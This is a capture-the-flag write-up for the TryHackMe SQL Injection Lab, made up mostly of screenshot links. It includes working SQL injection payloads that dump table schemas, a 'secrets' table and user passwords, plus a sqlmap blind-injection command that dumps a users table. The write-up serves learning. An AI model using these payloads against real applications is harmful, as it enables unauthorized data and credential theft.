SQL Injection Lab

# SQL Injection Lab (THM) ### Introduction to SQL Injection: Part 1 ![ảnh](https://hackmd.io/_uploads/ry_4Sz1Ua.png) ![ảnh](https://hackmd.io/_uploads/HkLYSfk8a.png) ![ảnh](https://hackmd.io/_uploads/BkoDSz18p.png) ![ảnh](https://hackmd.io/_uploads/Bk4UHMyUp.png) ![ảnh](https://hackmd.io/_uploads/HJqXUMJLp.png) ![ảnh](https://hackmd.io/_uploads/HJ3VLfJ8p.png) ![ảnh](https://hackmd.io/_uploads/rkmf8fJLp.png) ![Uploading file..._xv7i0qol0]() ![ảnh](https://hackmd.io/_uploads/B1uHDfkUp.png) ![ảnh](https://hackmd.io/_uploads/rym-wfkUT.png) ![ảnh](https://hackmd.io/_uploads/ByMmPM1Ia.png) ![ảnh](https://hackmd.io/_uploads/B1W0LGy8p.png) ![ảnh](https://hackmd.io/_uploads/BJMiuGJL6.png) ![ảnh](https://hackmd.io/_uploads/ryr9_zy8T.png) ![ảnh](https://hackmd.io/_uploads/SyAEdfJIp.png) ### Introduction to SQL Injection: Part 2 ![ảnh](https://hackmd.io/_uploads/HkYQim18a.png) ```',nickName=(SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'),email='``` ![ảnh](https://hackmd.io/_uploads/S1lCO71U6.png) ```',nickName=(SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='secrets'),email='``` ![ảnh](https://hackmd.io/_uploads/BkYVtX1LT.png) ```',nickName=(SELECT group_concat(id || "," || author || "," || secret || ":") from secrets),email='``` ![ảnh](https://hackmd.io/_uploads/BySrc71L6.png) ### Vulnerable Startup: Broken Authentication ![ảnh](https://hackmd.io/_uploads/S1SviQ18T.png) ![ảnh](https://hackmd.io/_uploads/SkMjoQJI6.png) ![ảnh](https://hackmd.io/_uploads/ryrLoQ18a.png) ### Vulnerable Startup: Broken Authentication 2 ```' UNION SELECT 1,group_concat(password) FROM users-- -``` ![ảnh](https://hackmd.io/_uploads/SJHCLHg8p.png) ![ảnh](https://hackmd.io/_uploads/SyEHwBlIT.png) ![ảnh](https://hackmd.io/_uploads/rkxT8HeIp.png) ![ảnh](https://hackmd.io/_uploads/BJw7vSe8p.png) ### Vulnerable Startup: Broken Authentication 3 (Blind Injection) **sqlmap -u http://10.10.151.38:5000/challenge3/login --data="username=admin&password=admin" --level=5 --risk=3 --dbms=sqlite --technique=b -D SQLite_masterdb -T users --dump** ![ảnh](https://hackmd.io/_uploads/SJUi5rxLp.png) ![ảnh](https://hackmd.io/_uploads/By6JCBxUp.png) ![ảnh](https://hackmd.io/_uploads/Hyxd0HlUa.png) ### Vulnerable Startup: Vulnerable Notes **' union select 1,group_concat(password) from users'** ![ảnh](https://hackmd.io/_uploads/SkfuD8gUa.png) ![ảnh](https://hackmd.io/_uploads/S1n2PUg8a.png) ![ảnh](https://hackmd.io/_uploads/S1SNOIe8a.png) ### Vulnerable Startup: Change Password ![ảnh](https://hackmd.io/_uploads/BkM0YLxIT.png) ![ảnh](https://hackmd.io/_uploads/BkZLq8eUp.png) ### Vulnerable Startup: Book Title ![ảnh](https://hackmd.io/_uploads/r1Lsj8xUp.png) ![ảnh](https://hackmd.io/_uploads/ryw2sUgL6.png) ### Vulnerable Startup: Book Title 2 **' UNION SELECT '-1''UNION SELECT 1,2,3,group_concat(password) FROM users-- -** ![ảnh](https://hackmd.io/_uploads/rkK6TLxLa.png) ![ảnh](https://hackmd.io/_uploads/rk9BgDlIa.png)